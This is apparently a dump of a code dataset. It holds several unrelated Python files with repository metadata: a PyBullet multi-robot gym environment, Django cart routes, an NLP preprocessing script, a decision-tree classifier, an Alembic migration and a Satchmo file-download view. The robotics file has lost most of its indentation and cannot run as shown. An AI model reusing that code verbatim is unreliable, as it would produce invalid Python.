def update_grippable_objects(self, gripper_action, robot_name, robot):
all_distances = []
if self.gripper_enabled_robots[robot_name]:
for object_name, obj in self.all_grippable_objects.items():
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
finger_COM_pos, finger_COM_orien = robot.get_finger_COM()
obj_pos, _ = obj.get_pos_orient(joint)
dist_finger_COM_to_obj = abs(np.linalg.norm(obj_pos-finger_COM_pos))
all_distances.append(abs(dist_finger_COM_to_obj))
# When distance is lower than threshold then set robot.grippable[object_name]['grippable'] to True
robot.grippable[object_name]['grippable']['joint_'+str(joint)] = True if dist_finger_COM_to_obj < self.threshold_picking else False
# If robot is ready to grip and the object is grippable then update its position
if robot.grippable[object_name]['grippable']['joint_'+str(joint)] and gripper_action:
if robot.grippable[object_name]['constraint']['joint_'+str(joint)] is None:
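                            # a point-to-point constraint between the end effector and the object joint acts as a virtual grasp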
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = p.createConstraint(robot.body, robot.end_effector, obj.body, joint, p.JOINT_POINT2POINT, [0, 0, 0], parentFramePosition=[0,0,0], childFramePosition=[0, 0, 0], parentFrameOrientation=[0,0,0,1], childFrameOrientation=[0, 0, 0, 1], physicsClientId=self.id)
# robot.control(robot.gripper_indices, robot.closed_gripper, robot.motor_gains, robot.motor_forces)
else:
robot.its_gripping = False
if robot.grippable[object_name]['constraint']['joint_'+str(joint)] is not None:
p.removeConstraint(robot.grippable[object_name]['constraint']['joint_'+str(joint)], physicsClientId=self.id)
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = None
# robot.control(robot.gripper_indices, robot.opened_gripper, robot.motor_gains, robot.motor_forces)
robot.visual_gripping = True if any(i<0.03 for i in all_distances) else False
constraints_list = []
for object_name, obj in self.all_grippable_objects.items():
for const_id, const in robot.grippable[object_name]['constraint'].items():
constraints_list.append(const)
if all(v is None for v in constraints_list):
robot.its_gripping = False
robot.control(robot.gripper_indices, robot.opened_gripper, robot.motor_gains, robot.motor_forces)
robot.buff = 0
else:
robot.its_gripping = True
if robot.buff == 0 and robot.visual_gripping:
robot.control(robot.gripper_indices, robot.closed_gripper, robot.motor_gains, robot.motor_forces)
                robot.buff += 1
def update_robot_finger_COM(self):
for robot_name, robot in self.my_robots.items():
finger_COM_pos, _ = robot.get_finger_COM()
robot.finger_COM_sphere.set_base_pos_orient(finger_COM_pos, [0, 0, 0, 1])
def render(self, mode='human'):
if not self.gui:
self.gui = True
if self.id is not None:
self.disconnect()
try:
self.width = get_monitors()[0].width
self.height = get_monitors()[0].height
except Exception as e:
self.width = 1920
self.height = 1080
self.id = p.connect(p.GUI, options='--background_color_red=0.81 --background_color_green=0.93 --background_color_blue=0.99 --width=%d --height=%d' % (self.width, self.height))
self.util = Util(self.id, self.np_random)
def get_euler(self, quaternion):
return np.array(p.getEulerFromQuaternion(np.array(quaternion), physicsClientId=self.id))
def get_quaternion(self, euler):
return np.array(p.getQuaternionFromEuler(np.array(euler), physicsClientId=self.id))
def setup_camera(self, camera_eye=[0.5, -0.75, 1.5], camera_target=[-0.2, 0, 0.75], fov=60, camera_width=1920//4, camera_height=1080//4):
self.camera_width = camera_width
self.camera_height = camera_height
self.view_matrix = p.computeViewMatrix(camera_eye, camera_target, [0, 0, 1], physicsClientId=self.id)
self.projection_matrix = p.computeProjectionMatrixFOV(fov, camera_width / camera_height, 0.01, 100, physicsClientId=self.id)
def setup_camera_rpy(self, camera_target=[-0.2, 0, 0.75], distance=1.5, rpy=[0, -35, 40], fov=60, camera_width=1920//4, camera_height=1080//4):
self.camera_width = camera_width
self.camera_height = camera_height
self.view_matrix = p.computeViewMatrixFromYawPitchRoll(camera_target, distance, rpy[2], rpy[1], rpy[0], 2, physicsClientId=self.id)
self.projection_matrix = p.computeProjectionMatrixFOV(fov, camera_width / camera_height, 0.01, 100, physicsClientId=self.id)
def get_camera_image_depth(self, light_pos=[0, -3, 1], shadow=False, ambient=0.8, diffuse=0.3, specular=0.1):
assert self.view_matrix is not None, 'You must call env.setup_camera() or env.setup_camera_rpy() before getting a camera image'
w, h, img, depth, _ = p.getCameraImage(self.camera_width, self.camera_height, self.view_matrix, self.projection_matrix, lightDirection=light_pos, shadow=shadow, lightAmbientCoeff=ambient, lightDiffuseCoeff=diffuse, lightSpecularCoeff=specular, physicsClientId=self.id)
img = np.reshape(img, (h, w, 4))
depth = np.reshape(depth, (h, w))
return img, depth
def create_sphere(self, radius=0.01, mass=0.0, pos=[0, 0, 0], visual=True, collision=True, rgba=[0, 1, 1, 1], maximal_coordinates=False, return_collision_visual=False):
sphere_collision = p.createCollisionShape(shapeType=p.GEOM_SPHERE, radius=radius, physicsClientId=self.id) if collision else -1
sphere_visual = p.createVisualShape(shapeType=p.GEOM_SPHERE, radius=radius, rgbaColor=rgba, physicsClientId=self.id) if visual else -1
if return_collision_visual:
return sphere_collision, sphere_visual
body = p.createMultiBody(baseMass=mass, baseCollisionShapeIndex=sphere_collision, baseVisualShapeIndex=sphere_visual, basePosition=pos, useMaximalCoordinates=maximal_coordinates, physicsClientId=self.id)
sphere = Agent()
sphere.init(body, self.id, self.np_random, indices=-1)
return sphere
def randomize_init_joint_angles(self, min_dist=0.5, radius=2, joint_randomness=0.15):
done = False
while not done:
# random_angles = {}
# # Generate random angles for each robot
# for robot_name, robot in self.my_robots.items():
# random_angles[robot_name] = []
# for joint in robot.arm_joint_indices:
# random_angles[robot_name].append(self.np_random.uniform(robot.lower_limits[joint]*joint_randomness, robot.upper_limits[joint]*joint_randomness))
# robot.set_joint_angles(robot.arm_joint_indices, random_angles[robot_name])
for robot_name, robot in self.my_robots.items():
robot_pos, _ = robot.get_base_pos_orient()
random_end_effector_pos = [random.uniform(robot_pos[0]-radius, robot_pos[0]+radius),
random.uniform(robot_pos[1]-radius, robot_pos[1]+radius),
random.uniform(robot_pos[2], robot_pos[2]+radius)]
self.set_end_effector_pos(robot, random_end_effector_pos, threshold=1e-2, maxIter=100)
# Collect all joint pos and obj pos(last 4 joints is enough)
joints_pos = {}
for robot_name, robot in self.my_robots.items():
joints_pos[robot_name] = []
for joint in robot.arm_joint_indices[-5:]:
j_pos, _ = robot.get_pos_orient(joint)
joints_pos[robot_name].append(j_pos)
objects_pos = []
for obj in Object.instances:
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
obj_pos, _ = obj.get_pos_orient(joint)
objects_pos.append(obj_pos)
# Check for collision between robots and objects in the environment
done = True
for robot_name_i, robot_i in self.my_robots.items():
for robot_name_j, robot_j in self.my_robots.items():
if robot_name_i != robot_name_j:
joints_pos_i = joints_pos[robot_name_i]
joints_pos_j = joints_pos[robot_name_j]
for joint_pos_i in joints_pos_i:
for joint_pos_j in joints_pos_j:
dist = np.linalg.norm(joint_pos_i-joint_pos_j)
if abs(dist) < min_dist:
done = False
            for robot_name, robot in self.my_robots.items():
                for obj_pos in objects_pos:
                    for joint_pos in joints_pos[robot_name]:
                        dist = np.linalg.norm(joint_pos - obj_pos)
                        if abs(dist) < min_dist:
                            done = False
def set_end_effector_pos(self, robot, target_position, target_orient=None, threshold=1e-15, maxIter=1000):
if target_orient is not None and len(target_orient) == 3:
target_orient = self.get_quaternion(target_orient)
closeEnough = False
iter = 0
dist2 = 1e30
while (not closeEnough and iter < maxIter):
joint_pos = p.calculateInverseKinematics(bodyIndex=robot.body, endEffectorLinkIndex=robot.end_effector, targetPosition=target_position, targetOrientation=target_orient, physicsClientId=self.id)
robot.set_joint_angles_all(joint_pos)
ls = p.getLinkState(robot.body, robot.end_effector)
newPos = ls[4]
diff = [target_position[0] - newPos[0], target_position[1] - newPos[1], target_position[2] - newPos[2]]
dist2 = (diff[0] * diff[0] + diff[1] * diff[1] + diff[2] * diff[2])
closeEnough = (dist2 < threshold)
iter = iter + 1
def disable_collision(self, obj_1, obj_2):
body_1 = obj_1.body
body_2 = obj_2.body
for i in range(p.getNumJoints(body_1, physicsClientId=self.id)):
for j in range(p.getNumJoints(body_2, physicsClientId=self.id)):
p.setCollisionFilterPair(body_1, body_2, i, j, 0, physicsClientId=self.id)
def get_euler(self, quaternion):
return np.array(p.getEulerFromQuaternion(np.array(quaternion), physicsClientId=self.id))
def get_quaternion(self, euler):
return np.array(p.getQuaternionFromEuler(np.array(euler), physicsClientId=self.id))
def init_env_variables(self):
# Select all grippable objects
i = 0
self.all_grippable_objects = {}
for obj in Object.instances:
if obj.enable_gripping:
i += 1
object_name = 'object_' + str(i)
self.all_grippable_objects[object_name] = obj
for robot_name, robot in self.my_robots.items():
robot.buff = 0
robot.grippable = {}
robot.ready_to_grip = False
for object_name, obj in self.all_grippable_objects.items():
robot.grippable[object_name] = {'obj': obj, 'grippable': {}, 'constraint': {}}
for joint in range(-1,p.getNumJoints(obj.body, physicsClientId=self.id)):
robot.grippable[object_name]['constraint']['joint_'+str(joint)] = None
|
gabriansa/collaborative-gym
|
collaborative_gym/envs/base_env.py
|
base_env.py
|
py
| 20,082 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "gym.Env",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "pybullet.connect",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "pybullet.DIRECT",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_name": "util.Util",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 30,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "os.path.realpath",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "gym.spaces.Box",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "gym.spaces",
"line_number": 42,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 42,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 42,
"usage_type": "attribute"
},
{
"api_name": "gym.spaces.Box",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "gym.spaces",
"line_number": 52,
"usage_type": "name"
},
{
"api_name": "numpy.array",
"line_number": 52,
"usage_type": "call"
},
{
"api_name": "numpy.float32",
"line_number": 52,
"usage_type": "attribute"
},
{
"api_name": "agents.agent.Agent",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "gym.utils.seeding.np_random",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "gym.utils.seeding",
"line_number": 63,
"usage_type": "name"
},
{
"api_name": "pybullet.disconnect",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "pybullet.resetSimulation",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "pybullet.connect",
"line_number": 80,
"usage_type": "call"
},
{
"api_name": "pybullet.DIRECT",
"line_number": 80,
"usage_type": "attribute"
},
{
"api_name": "util.Util",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "pybullet.resetDebugVisualizerCamera",
"line_number": 85,
"usage_type": "call"
},
{
"api_name": "pybullet.configureDebugVisualizer",
"line_number": 86,
"usage_type": "call"
},
{
"api_name": "pybullet.COV_ENABLE_MOUSE_PICKING",
"line_number": 86,
"usage_type": "attribute"
},
{
"api_name": "pybullet.configureDebugVisualizer",
"line_number": 87,
"usage_type": "call"
},
{
"api_name": "pybullet.COV_ENABLE_GUI",
"line_number": 87,
"usage_type": "attribute"
},
{
"api_name": "pybullet.setTimeStep",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "pybullet.setRealTimeSimulation",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "pybullet.setGravity",
"line_number": 91,
"usage_type": "call"
},
{
"api_name": "agents.objects.Object.instances",
"line_number": 100,
"usage_type": "attribute"
},
{
"api_name": "agents.objects.Object",
"line_number": 100,
"usage_type": "name"
},
{
"api_name": "pybullet.loadURDF",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 105,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 105,
"usage_type": "attribute"
},
{
"api_name": "pybullet.configureDebugVisualizer",
"line_number": 110,
"usage_type": "call"
},
{
"api_name": "pybullet.COV_ENABLE_RENDERING",
"line_number": 110,
"usage_type": "attribute"
},
{
"api_name": "time.time",
"line_number": 120,
"usage_type": "call"
},
{
"api_name": "numpy.clip",
"line_number": 125,
"usage_type": "call"
},
{
"api_name": "pybullet.stepSimulation",
"line_number": 155,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 165,
"usage_type": "call"
},
{
"api_name": "time.sleep",
"line_number": 167,
"usage_type": "call"
},
{
"api_name": "time.time",
"line_number": 168,
"usage_type": "call"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 180,
"usage_type": "call"
},
{
"api_name": "numpy.linalg.norm",
"line_number": 183,
"usage_type": "call"
},
{
"api_name": "numpy.linalg",
"line_number": 183,
"usage_type": "attribute"
},
{
"api_name": "pybullet.createConstraint",
"line_number": 190,
"usage_type": "call"
},
{
"api_name": "pybullet.JOINT_POINT2POINT",
"line_number": 190,
"usage_type": "attribute"
},
{
"api_name": "pybullet.removeConstraint",
"line_number": 195,
"usage_type": "call"
},
{
"api_name": "screeninfo.get_monitors",
"line_number": 224,
"usage_type": "call"
},
{
"api_name": "screeninfo.get_monitors",
"line_number": 225,
"usage_type": "call"
},
{
"api_name": "pybullet.connect",
"line_number": 229,
"usage_type": "call"
},
{
"api_name": "pybullet.GUI",
"line_number": 229,
"usage_type": "attribute"
},
{
"api_name": "util.Util",
"line_number": 230,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "pybullet.getEulerFromQuaternion",
"line_number": 233,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 236,
"usage_type": "call"
},
{
"api_name": "pybullet.getQuaternionFromEuler",
"line_number": 236,
"usage_type": "call"
},
{
"api_name": "pybullet.computeViewMatrix",
"line_number": 241,
"usage_type": "call"
},
{
"api_name": "pybullet.computeProjectionMatrixFOV",
"line_number": 242,
"usage_type": "call"
},
{
"api_name": "pybullet.computeViewMatrixFromYawPitchRoll",
"line_number": 247,
"usage_type": "call"
},
{
"api_name": "pybullet.computeProjectionMatrixFOV",
"line_number": 248,
"usage_type": "call"
},
{
"api_name": "pybullet.getCameraImage",
"line_number": 252,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number": 253,
"usage_type": "call"
},
{
"api_name": "numpy.reshape",
"line_number": 254,
"usage_type": "call"
},
{
"api_name": "pybullet.createCollisionShape",
"line_number": 258,
"usage_type": "call"
},
{
"api_name": "pybullet.GEOM_SPHERE",
"line_number": 258,
"usage_type": "attribute"
},
{
"api_name": "pybullet.createVisualShape",
"line_number": 259,
"usage_type": "call"
},
{
"api_name": "pybullet.GEOM_SPHERE",
"line_number": 259,
"usage_type": "attribute"
},
{
"api_name": "pybullet.createMultiBody",
"line_number": 262,
"usage_type": "call"
},
{
"api_name": "agents.agent.Agent",
"line_number": 263,
"usage_type": "call"
},
{
"api_name": "random.uniform",
"line_number": 279,
"usage_type": "call"
},
{
"api_name": "random.uniform",
"line_number": 280,
"usage_type": "call"
},
{
"api_name": "random.uniform",
"line_number": 281,
"usage_type": "call"
},
{
"api_name": "agents.objects.Object.instances",
"line_number": 294,
"usage_type": "attribute"
},
{
"api_name": "agents.objects.Object",
"line_number": 294,
"usage_type": "name"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 295,
"usage_type": "call"
},
{
"api_name": "numpy.linalg.norm",
"line_number": 308,
"usage_type": "call"
},
{
"api_name": "numpy.linalg",
"line_number": 308,
"usage_type": "attribute"
},
{
"api_name": "numpy.linalg.norm",
"line_number": 315,
"usage_type": "call"
},
{
"api_name": "numpy.linalg",
"line_number": 315,
"usage_type": "attribute"
},
{
"api_name": "pybullet.calculateInverseKinematics",
"line_number": 326,
"usage_type": "call"
},
{
"api_name": "pybullet.getLinkState",
"line_number": 328,
"usage_type": "call"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 338,
"usage_type": "call"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 339,
"usage_type": "call"
},
{
"api_name": "pybullet.setCollisionFilterPair",
"line_number": 340,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 343,
"usage_type": "call"
},
{
"api_name": "pybullet.getEulerFromQuaternion",
"line_number": 343,
"usage_type": "call"
},
{
"api_name": "numpy.array",
"line_number": 346,
"usage_type": "call"
},
{
"api_name": "pybullet.getQuaternionFromEuler",
"line_number": 346,
"usage_type": "call"
},
{
"api_name": "agents.objects.Object.instances",
"line_number": 352,
"usage_type": "attribute"
},
{
"api_name": "agents.objects.Object",
"line_number": 352,
"usage_type": "name"
},
{
"api_name": "pybullet.getNumJoints",
"line_number": 364,
"usage_type": "call"
}
] |
40633067575
|
from django.urls import path
from .views import (
add_to_cart,
delete_from_cart,
order_details,
checkout,
update_transaction_records,
success
)
app_name = 'cart'
urlpatterns = [
    path('add-to-cart/<int:pk>/<slug:slug>/', add_to_cart, name="add_to_cart"),
    path('order-summary/', order_details, name="order_summary"),
    path('success/', success, name='purchase_success'),
    path('item/delete/<int:pk>/<slug:slug>/', delete_from_cart, name='delete_item'),
    path('checkout/', checkout, name='checkout'),
# path('^update-transaction/(?P<token>[-\w]+)/', update_transaction_records,
# name='update_records')
]
|
sadakchap/cfe-ecom
|
cart/urls.py
|
urls.py
|
py
| 662 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "django.urls.path",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "views.add_to_cart",
"line_number": 14,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "views.order_details",
"line_number": 15,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "views.success",
"line_number": 16,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "views.delete_from_cart",
"line_number": 17,
"usage_type": "argument"
},
{
"api_name": "django.urls.path",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "views.checkout",
"line_number": 18,
"usage_type": "argument"
}
] |
16647141836
|
import os
import pandas as pd
import numpy as np
from tqdm.auto import tqdm
from textaugment import EDA
from nltk.tokenize import word_tokenize
class DataProcessing:
def __init__(self, input_path, output_path):
self.input_path = input_path
self.output_path = output_path
self.X = None
self.label = None
self.text = None
def read_file(self):
data = pd.read_csv(self.input_path, names=['text', 'label'])
self.text = data.text
if not data.label.isnull().all():
self.label = data.label
def convert_to_vector(self, emb_dict):
X = []
emb_len = len([*emb_dict.values()][0])
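        # sentence embedding: average the vectors of the words found in the embedding
        # dictionary; a sentence with no known words keeps the zero vector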
for sentence in self.text.values:
vector = np.zeros((1, emb_len))
words = [word for word in sentence.split() if word in emb_dict.keys()]
if len(words):
vector = np.mean([emb_dict[w] for w in words], axis=0)
X.append(vector)
self.X = np.vstack(X)
def augment_text(self, def_val=3):
eda = EDA()
avg = int(len(self.label) / self.label.nunique())
small_classes = (self.label.value_counts().reset_index(name='cnt')
.query(f'cnt < {avg}')['index'].values)
for cl in tqdm(small_classes):
tmp_df = self.text[self.label == cl]
for sentence in tmp_df.values:
text_aug = pd.Series([eda.synonym_replacement(sentence)
for _ in range(def_val)])
if sum(self.label==cl) > avg:
break
self.text = self.text.append(text_aug, ignore_index=True)
self.label = self.label.append(pd.Series([cl] * def_val),
ignore_index=True)
def shuffle_data(self):
        new_index = np.random.permutation(len(self.label))
self.label = self.label[new_index]
self.text = self.text[new_index]
def save_data(self):
np.save(os.path.join(self.output_path, 'X.npy'), self.X)
if self.label is not None:
np.save(os.path.join(self.output_path, 'Y.npy'),
self.label.to_numpy())
@staticmethod
def load_embedding(file_path):
embedding_dict = {}
with open(file_path, 'r') as f:
for line in tqdm(f):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], 'float32')
embedding_dict[word] = vectors
f.close()
return embedding_dict
|
marynadorosh/test_task
|
src/data/make_dataset.py
|
make_dataset.py
|
py
| 2,626 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.vstack",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "textaugment.EDA",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "tqdm.auto.tqdm",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "numpy.random.permutation",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 59,
"usage_type": "attribute"
},
{
"api_name": "numpy.save",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 65,
"usage_type": "attribute"
},
{
"api_name": "numpy.save",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 67,
"usage_type": "attribute"
},
{
"api_name": "tqdm.auto.tqdm",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 78,
"usage_type": "call"
}
] |
41682530680
|
"""add directory id to address
Revision ID: 19e625982be8
Revises: a9adfd3c2eba
Create Date: 2018-02-02 23:11:03.395662
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '19e625982be8'
down_revision = 'a9adfd3c2eba'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('address', sa.Column('directory_id', sa.Integer(), nullable=True), schema='monday')
op.create_index(op.f('ix_monday_address_directory_id'), 'address', ['directory_id'], unique=False, schema='monday')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_monday_address_directory_id'), table_name='address', schema='monday')
op.drop_column('address', 'directory_id', schema='monday')
# ### end Alembic commands ###
|
MondayHealth/provider-import
|
alembic/versions/19e625982be8_add_directory_id_to_address.py
|
19e625982be8_add_directory_id_to_address.py
|
py
| 973 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "alembic.op.add_column",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Integer",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op.create_index",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "alembic.op.f",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "alembic.op.drop_index",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "alembic.op.f",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "alembic.op.drop_column",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 29,
"usage_type": "name"
}
] |
8099648005
|
import pandas as pd
import pydotplus
from IPython.display import Image
from sklearn import metrics
from sklearn.externals.six import StringIO
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier, export_graphviz
# names of all columns in the CSV
column_names = ['Elevation', 'Aspect', 'Slope', 'Horizontal_Distance_To_Hydrology', 'Vertical_Distance_To_Hydrology',
'Horizontal_Distance_To_Roadways', 'Hillshade_9am', 'Hillshade_Noon', 'Hillshade_3pm',
'Horizontal_Distance_To_Fire_Points', 'Wilderness_Area1', 'Wilderness_Area2', 'Wilderness_Area3',
'Wilderness_Area4', 'Soil_Type1', 'Soil_Type2', 'Soil_Type3', 'Soil_Type4', 'Soil_Type5', 'Soil_Type6',
'Soil_Type7', 'Soil_Type8', 'Soil_Type9', 'Soil_Type10', 'Soil_Type11', 'Soil_Type12', 'Soil_Type13',
'Soil_Type14', 'Soil_Type15', 'Soil_Type16', 'Soil_Type17', 'Soil_Type18', 'Soil_Type19', 'Soil_Type20',
'Soil_Type21', 'Soil_Type22', 'Soil_Type23', 'Soil_Type24', 'Soil_Type25', 'Soil_Type26', 'Soil_Type27',
'Soil_Type28', 'Soil_Type29', 'Soil_Type30', 'Soil_Type31', 'Soil_Type32', 'Soil_Type33', 'Soil_Type34',
'Soil_Type35', 'Soil_Type36', 'Soil_Type37', 'Soil_Type38', 'Soil_Type39', 'Soil_Type40', 'Cover_Type']
# load the dataset
dataset = pd.read_csv("covtype.csv", header=None, names=column_names)
# split out the feature columns and the target variable
feature_cols = column_names[:-1]
X = dataset[feature_cols]
y = dataset.Cover_Type
# split the dataset into training and test sets
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)
# train the model
clf = DecisionTreeClassifier()
clf = clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print("Accuracy: {}".format(metrics.accuracy_score(y_test, y_pred)))
dot_data = StringIO()
# generate and export the decision-tree graphic
# depth is capped at 5 because anything above that takes hours to generate
export_graphviz(clf, max_depth=5, out_file=dot_data, filled=True, rounded=True, special_characters=True,
feature_names=feature_cols)
print('Graphviz generated')
graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
graph.write_png('trees.png')
Image(graph.create_png())
print('End of script.')
|
fedoruka/fct_classification
|
main.py
|
main.py
|
py
| 2,347 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "sklearn.tree.DecisionTreeClassifier",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.accuracy_score",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "sklearn.externals.six.StringIO",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "sklearn.tree.export_graphviz",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "pydotplus.graph_from_dot_data",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "IPython.display.Image",
"line_number": 46,
"usage_type": "call"
}
] |
26625188476
|
from django.conf import settings
from django.core import urlresolvers
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
from product.modules.downloadable.models import DownloadLink
from satchmo_store.shop.signals import sendfile_url_for_file
import mimetypes
import os
import os.path
import re
from urlparse import urljoin
SHA1_RE = re.compile('^[a-f0-9]{40}$')
def _validate_key(download_key):
"""
Helper function to make sure the key is valid and all the other constraints on
the download are still valid.
Returns a tuple (False,"Error Message", None) or (True, None, dl_product)
"""
download_key = download_key.lower()
if not SHA1_RE.search(download_key):
error_message = _("The download key is invalid.")
return (False, error_message, None)
try:
dl_product = DownloadLink.objects.get(key=download_key)
except:
error_message = _("The download key is invalid.")
return (False, error_message, None)
valid, msg = dl_product.is_valid()
if not valid:
return (False, msg, None)
else:
return (True, None, dl_product)
def process(request, download_key):
"""
Validate that the key is good, then set a session variable.
Redirect to the download view.
We use this two step process so that we can easily display meaningful feedback
to the user.
"""
valid, msg, dl_product = _validate_key(download_key)
if not valid:
context = RequestContext(request, {'error_message': msg})
return render_to_response('shop/download.html',
context_instance=context)
else:
# The key is valid so let's set the session variable and redirect to the
# download view
request.session['download_key'] = download_key
url = urlresolvers.reverse('satchmo_download_send', kwargs= {'download_key': download_key})
context = RequestContext(request, {'download_product': dl_product,
'dl_url' : url})
return render_to_response('shop/download.html', context_instance=context)
def send_file(request, download_key):
"""
After the appropriate session variable has been set, we commence the download.
The key is maintained in the url but the session variable is used to control the
download in order to maintain security.
"""
if not request.session.get('download_key', False):
url = urlresolvers.reverse('satchmo_download_process', kwargs = {'download_key': download_key})
return HttpResponseRedirect(url)
valid, msg, dl_product = _validate_key(request.session['download_key'])
if not valid:
url = urlresolvers.reverse('satchmo_download_process', kwargs = {'download_key': request.session['download_key']})
return HttpResponseRedirect(url)
# some temp vars
file = dl_product.downloadable_product.file
file_url = '/%s' % file.name # create an absolute/root url
# poll listeners
url_dict = {'url': file_url}
sendfile_url_for_file.send(
None, file=file,
product=dl_product.downloadable_product,
url_dict=url_dict,
)
# url may have changed; update it
file_url = url_dict['url']
# get file name from url
file_name = os.path.basename(file_url)
dl_product.num_attempts += 1
dl_product.save()
del request.session['download_key']
response = HttpResponse()
# For Nginx
response['X-Accel-Redirect'] = file_url
# For Apache and Lighttpd v1.5
response['X-Sendfile'] = file_url
# For Lighttpd v1.4
response['X-LIGHTTPD-send-file'] = file_url
response['Content-Disposition'] = "attachment; filename=%s" % file_name
response['Content-length'] = file.size
contenttype, encoding = mimetypes.guess_type(file_name)
if contenttype:
response['Content-type'] = contenttype
return response
|
dokterbob/satchmo
|
satchmo/apps/product/modules/downloadable/views.py
|
views.py
|
py
| 4,066 |
python
|
en
|
code
| 30 |
github-code
|
6
|
[
{
"api_name": "re.compile",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "product.modules.downloadable.models.DownloadLink.objects.get",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "product.modules.downloadable.models.DownloadLink.objects",
"line_number": 29,
